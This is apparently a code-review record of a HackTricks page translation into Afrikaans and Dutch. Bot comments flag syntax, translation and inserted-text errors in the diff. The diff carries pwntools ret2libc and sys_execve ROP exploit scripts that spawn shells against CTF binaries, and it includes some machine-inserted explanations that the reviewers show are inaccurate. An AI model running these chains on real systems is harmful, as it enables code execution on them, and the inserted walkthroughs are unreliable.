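Review bot: the same whitespace-only change appears in the `try:`/`except:` block (`libc_func = "puts"` and `PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts` show as changed with identical text), and an unindented `try` body is a syntax error. While these lines are being rewritten, narrow the bare `except:` to `except KeyError:` so that only a missing `puts` entry falls back to `printf`, rather than any error being silently swallowed.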
@ -100,54 +98,54 @@ log.info("ret gadget: " + hex(RET))
|
|||
########################
|
||||
|
||||
def generate_payload_aligned(rop):
|
||||
payload1 = OFFSET + rop
|
||||
if (len(payload1) % 16) == 0:
|
||||
return payload1
|
||||
|
||||
else:
|
||||
payload2 = OFFSET + p64(RET) + rop
|
||||
if (len(payload2) % 16) == 0:
|
||||
log.info("Payload aligned successfully")
|
||||
return payload2
|
||||
else:
|
||||
log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
|
||||
return payload1
|
||||
payload1 = OFFSET + rop
|
||||
if (len(payload1) % 16) == 0:
|
||||
return payload1
|
||||
|
||||
else:
|
||||
payload2 = OFFSET + p64(RET) + rop
|
||||
if (len(payload2) % 16) == 0:
|
||||
log.info("Payload aligned successfully")
|
||||
return payload2
|
||||
else:
|
||||
log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
|
||||
return payload1
|
||||
|
||||
|
||||
def get_addr(libc_func):
|
||||
FUNC_GOT = ELF_LOADED.got[libc_func]
|
||||
log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
|
||||
# Create rop chain
|
||||
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
|
||||
rop1 = generate_payload_aligned(rop1)
|
||||
FUNC_GOT = ELF_LOADED.got[libc_func]
|
||||
log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
|
||||
# Create rop chain
|
||||
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
|
||||
rop1 = generate_payload_aligned(rop1)
|
||||
|
||||
# Send our rop-chain payload
|
||||
#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received
|
||||
print(P.clean()) # clean socket buffer (read all and print)
|
||||
P.sendline(rop1)
|
||||
# Send our rop-chain payload
|
||||
#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received
|
||||
print(P.clean()) # clean socket buffer (read all and print)
|
||||
P.sendline(rop1)
|
||||
|
||||
# If binary is echoing back the payload, remove that message
|
||||
recieved = P.recvline().strip()
|
||||
if OFFSET[:30] in recieved:
|
||||
recieved = P.recvline().strip()
|
||||
|
||||
# Parse leaked address
|
||||
log.info(f"Len rop1: {len(rop1)}")
|
||||
leak = u64(recieved.ljust(8, b"\x00"))
|
||||
log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
|
||||
|
||||
# Set lib base address
|
||||
if LIBC:
|
||||
LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
|
||||
print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
|
||||
log.info("LIBC base @ %s" % hex(LIBC.address))
|
||||
# If binary is echoing back the payload, remove that message
|
||||
recieved = P.recvline().strip()
|
||||
if OFFSET[:30] in recieved:
|
||||
recieved = P.recvline().strip()
|
||||
|
||||
# If not LIBC yet, stop here
|
||||
else:
|
||||
print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
|
||||
P.interactive()
|
||||
|
||||
return hex(leak)
|
||||
# Parse leaked address
|
||||
log.info(f"Len rop1: {len(rop1)}")
|
||||
leak = u64(recieved.ljust(8, b"\x00"))
|
||||
log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
|
||||
|
||||
# Set lib base address
|
||||
if LIBC:
|
||||
LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
|
||||
print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
|
||||
log.info("LIBC base @ %s" % hex(LIBC.address))
|
||||
|
||||
# If not LIBC yet, stop here
|
||||
else:
|
||||
print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
|
||||
P.interactive()
|
||||
|
||||
return hex(leak)
|
||||
|
||||
get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
|
||||
|
||||
|
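Review bot: this 54-line hunk replaces the entire bodies of `generate_payload_aligned` and `get_addr` with visibly identical lines (`payload1 = OFFSET + rop`, `FUNC_GOT = ELF_LOADED.got[libc_func]`, `return hex(leak)`), so again only indentation changed; a flattened `get_addr` would place `LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base` outside `if LIBC:` and `return hex(leak)` at module level, which is a syntax error. Since the lines are being rewritten anyway, also fix the message `print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")` ("end end", "icorrect") and the misspelt `recieved` variable.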
@ -160,39 +158,39 @@ get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
|
|||
## Via One_gadget (https://github.com/david942j/one_gadget)
|
||||
# gem install one_gadget
|
||||
def get_one_gadgets(libc):
|
||||
import string, subprocess
|
||||
args = ["one_gadget", "-r"]
|
||||
if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
|
||||
args += ["-b", libc.hex()]
|
||||
else:
|
||||
args += [libc]
|
||||
try:
|
||||
one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
|
||||
except:
|
||||
print("One_gadget isn't installed")
|
||||
one_gadgets = []
|
||||
return
|
||||
import string, subprocess
|
||||
args = ["one_gadget", "-r"]
|
||||
if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
|
||||
args += ["-b", libc.hex()]
|
||||
else:
|
||||
args += [libc]
|
||||
try:
|
||||
one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
|
||||
except:
|
||||
print("One_gadget isn't installed")
|
||||
one_gadgets = []
|
||||
return
|
||||
|
||||
rop2 = b""
|
||||
if USE_ONE_GADGET:
|
||||
one_gadgets = get_one_gadgets(LIBC)
|
||||
if one_gadgets:
|
||||
rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
|
||||
one_gadgets = get_one_gadgets(LIBC)
|
||||
if one_gadgets:
|
||||
rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
|
||||
|
||||
## Normal/Long exploitation
|
||||
if not rop2:
|
||||
BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
|
||||
SYSTEM = LIBC.sym["system"]
|
||||
EXIT = LIBC.sym["exit"]
|
||||
|
||||
log.info("POP_RDI %s " % hex(POP_RDI))
|
||||
log.info("bin/sh %s " % hex(BINSH))
|
||||
log.info("system %s " % hex(SYSTEM))
|
||||
log.info("exit %s " % hex(EXIT))
|
||||
|
||||
rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
|
||||
rop2 = generate_payload_aligned(rop2)
|
||||
|
||||
BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
|
||||
SYSTEM = LIBC.sym["system"]
|
||||
EXIT = LIBC.sym["exit"]
|
||||
|
||||
log.info("POP_RDI %s " % hex(POP_RDI))
|
||||
log.info("bin/sh %s " % hex(BINSH))
|
||||
log.info("system %s " % hex(SYSTEM))
|
||||
log.info("exit %s " % hex(EXIT))
|
||||
|
||||
rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
|
||||
rop2 = generate_payload_aligned(rop2)
|
||||
|
||||
|
||||
print(P.clean())
|
||||
P.sendline(rop2)
|
||||
|
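Review bot: `rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains` concatenates bytes with a str and raises TypeError under Python 3, which this template targets (`rop2 = b""`, `LIBC.search(b"/bin/sh")`); it should be `b"\x00"*100`, and the gadget offset must be added to `LIBC.address` before packing, as the page itself does with `ONE_GADGET = libc.address + 0x4526a`. In `get_one_gadgets`, the `except:` branch sets `one_gadgets = []` and then does a bare `return`, so the caller receives `None` instead of the list, and the `len(libc) == 40 and all(x in string.hexdigits for x in libc.hex())` test expects a hash-like byte string although `LIBC` is an `ELF` object; pass the library file path to `one_gadget` instead.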
@ -201,51 +199,42 @@ P.interactive() #Interact with your shell :)
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
# Common problems
|
||||
# Algemene probleme
|
||||
|
||||
## MAIN\_PLT = elf.symbols\['main'] not found
|
||||
|
||||
If the "main" symbol does not exist. Then you can just where is the main code:
|
||||
## MAIN\_PLT = elf.symbols\['main'] nie gevind nie
|
||||
|
||||
As die "main" simbool nie bestaan nie. Dan kan jy net kyk waar die hoofkode is:
|
||||
```python
|
||||
objdump -d vuln_binary | grep "\.text"
|
||||
Disassembly of section .text:
|
||||
0000000000401080 <.text>:
|
||||
```
|
||||
|
||||
and set the address manually:
|
||||
|
||||
en stel die adres handmatig in:
|
||||
```python
|
||||
MAIN_PLT = 0x401080
|
||||
```
|
||||
## Puts nie gevind nie
|
||||
|
||||
## Puts not found
|
||||
As die binaêre lêer nie Puts gebruik nie, moet jy nagaan of dit gebruik maak van
|
||||
|
||||
If the binary is not using Puts you should check if it is using
|
||||
## `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie`
|
||||
|
||||
## `sh: 1: %s%s%s%s%s%s%s%s: not found`
|
||||
|
||||
If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
|
||||
|
||||
Try to **subtract 64 bytes to the address of "/bin/sh"**:
|
||||
As jy hierdie **fout** vind nadat jy **alle** die aanvalle geskep het: `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie`
|
||||
|
||||
Probeer om **64 byte van die adres van "/bin/sh" af te trek**:
|
||||
```python
|
||||
BINSH = next(libc.search("/bin/sh")) - 64
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
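Review bot: "binaêre" in "As die binaêre lêer nie Puts gebruik nie, moet jy nagaan of dit gebruik maak van" is a typo for "binêre" (the same sentence earlier in this commit has it right), and, as in that file, the shell message in `## `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie`` and in the sentence after it must stay `not found`, since it quotes what `sh` prints. The sentence "moet jy nagaan of dit gebruik maak van" also breaks off mid-clause, faithfully reproducing the unfinished English "you should check if it is using"; either complete it with the function to check for or drop it.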
@ -1,32 +1,31 @@
|
|||
# ROP - call sys\_execve
|
||||
# ROP - roep sys_execve aan
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Andere manieren om HackTricks te ondersteunen:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks in PDF wilt downloaden**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)!
|
||||
* Koop de [**officiële PEASS & HackTricks-merchandise**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit je aan bij de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
In order to prepare the call for the **syscall** it's needed the following configuration:
|
||||
Om de oproep voor de **syscall** voor te bereiden, is de volgende configuratie nodig:
|
||||
|
||||
* `rax: 59 Specify sys_execve`
|
||||
* `rdi: ptr to "/bin/sh" specify file to execute`
|
||||
* `rsi: 0 specify no arguments passed`
|
||||
* `rdx: 0 specify no environment variables passed`
|
||||
* `rax: 59 Specificeer sys_execve`
|
||||
* `rdi: ptr naar "/bin/sh" specificeer het uit te voeren bestand`
|
||||
* `rsi: 0 specificeer dat er geen argumenten worden doorgegeven`
|
||||
* `rdx: 0 specificeer dat er geen omgevingsvariabelen worden doorgegeven`
|
||||
|
||||
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack).
|
||||
Dus, in feite is het nodig om de string `/bin/sh` ergens te schrijven en vervolgens de `syscall` uit te voeren (met inachtneming van de padding die nodig is om de stack te controleren).
|
||||
|
||||
## Control the registers
|
||||
|
||||
Let's start by finding **how to control those registers**:
|
||||
## Beheer de registers
|
||||
|
||||
Laten we beginnen met het vinden van **hoe we die registers kunnen beheersen**:
|
||||
```c
|
||||
ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
|
||||
0x0000000000415664 : pop rax ; ret
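Review bot: the new lines in this hunk are Dutch, not Afrikaans, which contradicts the commit title and the other files in this commit: `Andere manieren om HackTricks te ondersteunen:`, `Als je je **bedrijf wilt adverteren in HackTricks**...` and `Laten we beginnen met het vinden van **hoe we die registers kunnen beheersen**:`, whereas the same footer elsewhere reads `Ander maniere om HackTricks te ondersteun:`. Re-translate this page (title, footer, syscall register list, `## Beheer de registers`) into Afrikaans. Two pre-existing defects in the context lines are worth fixing while the page is touched: the grep pattern `pop (rdi|rsi|rdx\rax) ; ret` has `\r` where the alternation `|` between `rdx` and `rax` is intended, and the fence around that shell command and its output is tagged `c`; `bash`, as used for the vmmap block further down, is the right tag.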
@ -34,15 +33,13 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x00000000004101f3 : pop rsi ; ret
|
||||
0x00000000004498b5 : pop rdx ; ret
|
||||
```
|
||||
Met hierdie adresse is dit moontlik om die inhoud in die stoor te skryf en dit in die registre te laai.
|
||||
|
||||
With these addresses it's possible to **write the content in the stack and load it into the registers**.
|
||||
## Skryf string
|
||||
|
||||
## Write string
|
||||
|
||||
### Writable memory
|
||||
|
||||
Frist you need to find a writable place in the memory
|
||||
### Skryfbare geheue
|
||||
|
||||
Eerstens moet jy 'n skryfbare plek in die geheue vind.
|
||||
```bash
|
||||
gef> vmmap
|
||||
[ Legend: Code | Heap | Stack ]
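Review bot: `Met hierdie adresse is dit moontlik om die inhoud in die stoor te skryf en dit in die registre te laai.` renders "stack" as "stoor" (storage); the rest of this commit uses "stapel" (`\> **bt** --> Stapel`, `## Vind stapelverskuiwing`), so use "stapel" here and keep the bold that the English line puts on `write the content in the stack and load it into the registers`. The headings `## Skryf string` here and `### Skryf String` in the next hunk should also agree on capitalisation.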
@ -51,18 +48,44 @@ Start End Offset Perm Path
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
|
||||
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
|
||||
```
|
||||
### Skryf String
|
||||
|
||||
### Write String
|
||||
|
||||
Then you need to find a way to write arbitrary content in this address
|
||||
|
||||
Dan moet jy 'n manier vind om willekeurige inhoud op hierdie adres te skryf
|
||||
```python
|
||||
ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
|
||||
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
|
||||
```
|
||||
#### 32-bits
|
||||
|
||||
#### 32 bits
|
||||
##### ROP (Return Oriented Programming)
|
||||
|
||||
ROP is a technique used in exploitation to bypass security measures like DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization). It involves chaining together small pieces of code, known as gadgets, to perform malicious actions.
|
||||
|
||||
##### Syscall
|
||||
|
||||
A syscall is a way for a program to request services from the operating system. In Linux, syscalls are identified by a number, and the parameters for the syscall are passed in registers.
|
||||
|
||||
##### Execv
|
||||
|
||||
The execv syscall is used to execute a program in Linux. It takes two arguments: the path to the program and an array of strings representing the program's arguments.
|
||||
|
||||
##### ROP + Syscall + Execv
|
||||
|
||||
To execute a program using ROP, we need to find gadgets that perform the necessary syscalls and set the appropriate registers. We can then chain these gadgets together to create a ROP chain that calls execv with the desired program and arguments.
|
||||
|
||||
##### Example
|
||||
|
||||
Here is an example of a ROP chain that calls execv to execute the "/bin/sh" program:
|
||||
|
||||
1. Find gadgets that set the registers for the execv syscall.
|
||||
2. Find a gadget that sets the EAX register to the syscall number for execv.
|
||||
3. Find a gadget that sets the EBX register to the address of the "/bin/sh" string.
|
||||
4. Find a gadget that sets the ECX register to the address of the argument array.
|
||||
5. Find a gadget that sets the EDX register to 0 (no environment variables).
|
||||
6. Find a gadget that performs the syscall instruction.
|
||||
7. Chain these gadgets together in the correct order, setting the registers and performing the syscall.
|
||||
|
||||
By carefully constructing the ROP chain, we can execute arbitrary programs with arbitrary arguments, giving us full control over the system.
|
||||
```python
|
||||
'''
|
||||
Lets write "/bin/sh" to 0x6b6000
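Review bot: the `#### 32 bits` section now carries an English block that was not on the page before and is not a translation: `##### ROP (Return Oriented Programming)`, `##### Syscall`, `##### Execv`, `##### Example` and a seven-step list that loads EAX/EBX/ECX/EDX for an "execv syscall". That describes a 32-bit calling convention, while the Python block right after it reuses the `mov qword ptr [rax], rdx ; ret` write gadget found above and the page's own register table is rax=59 (`sys_execve`), rdi, rsi, rdx; "execv" is the libc wrapper, not the syscall the page title names. Remove the inserted text and keep only the heading with the script. Minor: the ROPgadget search block is fenced with a `python` tag although it is a shell command and its output, and `Dan moet jy 'n manier vind om willekeurige inhoud op hierdie adres te skryf` lost its final period.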
@ -84,9 +107,42 @@ rop += popRax
rop += p32(0x6b6000 + 4)
|
||||
rop += writeGadget
|
||||
```
|
||||
#### 64-bits
|
||||
|
||||
#### 64 bits
|
||||
##### ROP + Syscall + execv
|
||||
|
||||
Hierdie tegniek maak gebruik van Return-Oriented Programming (ROP) in kombinasie met die Syscall-instruksie en die execv-sisteemoproep om 'n uitvoerbare lêer uit te voer op 'n 64-bits Linux-stelsel.
|
||||
|
||||
##### Stap 1: Identifiseer die funksies
|
||||
|
||||
Eerstens moet ons die funksies identifiseer wat ons sal gebruik in ons ROP-ketting. Ons het die volgende funksies nodig:
|
||||
|
||||
- `mprotect`: Hierdie funksie sal ons toelaat om die uitvoerbare geheuegebied te verander na lees-, skryf- en uitvoerbare (rwx) toestand.
|
||||
- `read`: Hierdie funksie sal ons toelaat om die uitvoerbare lêer in die geheue te lees.
|
||||
- `execve`: Hierdie funksie sal ons toelaat om die uitvoerbare lêer uit te voer.
|
||||
|
||||
##### Stap 2: Bou die ROP-ketting
|
||||
|
||||
Ons sal die volgende stappe volg om die ROP-ketting te bou:
|
||||
|
||||
1. Kry die adres van die `mprotect`-funksie in die geheue.
|
||||
2. Kry die adres van die `read`-funksie in die geheue.
|
||||
3. Kry die adres van die `execve`-funksie in die geheue.
|
||||
4. Kry die adres van die uitvoerbare lêer in die geheue.
|
||||
5. Bou die ROP-ketting deur die funksie-adresse en die nodige argumente in die regte volgorde te stapel.
|
||||
|
||||
##### Stap 3: Voer die ROP-ketting uit
|
||||
|
||||
Nadat die ROP-ketting gebou is, kan ons dit uitvoer deur die Syscall-instruksie te gebruik. Hier is die stappe wat ons moet volg:
|
||||
|
||||
1. Stel die regsiters korrek in vir die Syscall-instruksie.
|
||||
2. Voer die Syscall-instruksie uit.
|
||||
|
||||
##### Stap 4: Verifieer die uitvoering
|
||||
|
||||
Om te verseker dat die uitvoering suksesvol was, kan ons die uitvoer van die uitvoerbare lêer monitor.
|
||||
|
||||
Met hierdie tegniek kan ons 'n uitvoerbare lêer uitvoer op 'n 64-bits Linux-stelsel deur gebruik te maak van ROP, die Syscall-instruksie en die execv-sisteemoproep.
|
||||
```python
|
||||
'''
|
||||
Lets write "/bin/sh" to 0x6b6000
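Review bot: the `#### 64 bits` section gained a walkthrough (`##### ROP + Syscall + execv`, `##### Stap 1` to `##### Stap 4`) that does not describe this page's technique: it tells the reader to locate the `mprotect`, `read` and `execve` functions, make a region rwx, read an executable into it and run it, whereas the Python block below writes `/bin/sh` to writable memory with `rop += popRax`, `rop += p64(0x6b6000) # Writable memory` and `rop += writeGadget #Address to: mov qword ptr [rax], rdx`, and the page then issues `syscall` with rax=59, calling no library function at all. Drop the inserted steps (they also contain the typo `regsiters`) and keep the heading `#### 64 bits` with the script.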
@ -102,9 +158,35 @@ rop += popRax
rop += p64(0x6b6000) # Writable memory
|
||||
rop += writeGadget #Address to: mov qword ptr [rax], rdx
|
||||
```
|
||||
## Voorbeeld
|
||||
|
||||
## Example
|
||||
In this example, we will use a basic ROP (Return-Oriented Programming) technique to execute the `execv` system call in a Linux environment.
|
||||
|
||||
In hierdie voorbeeld sal ons 'n basiese ROP (Return-Oriented Programming) tegniek gebruik om die `execv` stelseloproep in 'n Linux omgewing uit te voer.
|
||||
|
||||
First, we need to find the addresses of the gadgets we will use in our ROP chain. We can use tools like `ROPgadget` or `ropper` to search for gadgets in the binary.
|
||||
|
||||
Eerstens moet ons die adresse van die gadgets wat ons in ons ROP-ketting sal gebruik, vind. Ons kan gereedskap soos `ROPgadget` of `ropper` gebruik om gadgets in die binêre lêer te soek.
|
||||
|
||||
Once we have the addresses, we can start building our ROP chain. The ROP chain will consist of the addresses of the gadgets we want to use, followed by the arguments for the `execv` system call.
|
||||
|
||||
Sodra ons die adresse het, kan ons begin om ons ROP-ketting te bou. Die ROP-ketting sal bestaan uit die adresse van die gadgets wat ons wil gebruik, gevolg deur die argumente vir die `execv` stelseloproep.
|
||||
|
||||
We will need gadgets that perform the following actions:
|
||||
1. Load the address of the `/bin/sh` string into a register.
|
||||
2. Load the address of the `execv` function into a register.
|
||||
3. Load the arguments for the `execv` function into registers.
|
||||
4. Call the `execv` function.
|
||||
|
||||
Ons sal gadgets benodig wat die volgende aksies uitvoer:
|
||||
1. Laai die adres van die `/bin/sh` string in 'n register.
|
||||
2. Laai die adres van die `execv` funksie in 'n register.
|
||||
3. Laai die argumente vir die `execv` funksie in registers.
|
||||
4. Roep die `execv` funksie aan.
|
||||
|
||||
Once we have our ROP chain, we can trigger the vulnerability to execute our ROP chain and ultimately the `execv` system call.
|
||||
|
||||
Sodra ons ons ROP-ketting het, kan ons die kwesbaarheid aktiveer om ons ROP-ketting en uiteindelik die `execv` stelseloproep uit te voer.
|
||||
```python
|
||||
from pwn import *
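Review bot: `## Voorbeeld` now holds every new paragraph twice, in English and in Afrikaans (`In this example, we will use a basic ROP...` followed by `In hierdie voorbeeld sal ons 'n basiese ROP...`), and none of this text was on the page before. The numbered list is also wrong for this exploit: `2. Load the address of the execv function into a register.` and `4. Call the execv function.` describe calling a libc function, but the script below, against a statically linked binary, sets rax to 59 and executes the `syscall` instruction directly. Keep only the heading and the script, or rewrite the list in Afrikaans so it matches the register table at the top of the page.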
@ -169,23 +251,22 @@ payload = "0"*0x408 + rop
# Send the payload, drop to an interactive shell to use our new shell
|
||||
target.sendline(payload)
|
||||
|
||||
target.interactive()
|
||||
target.interactive()
|
||||
```
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
|
||||
* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
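Review bot: `payload = "0"*0x408 + rop` in the context line at the top of this hunk concatenates a `str` with the `bytes` that pwntools' `p64()` returns, which raises a TypeError under Python 3; while the page is being touched, make the padding `b"0"*0x408` so that `target.sendline(payload)` sends bytes. The rest of the hunk only re-indents `target.interactive()` and translates the footer.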
@ -1,22 +1,19 @@
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
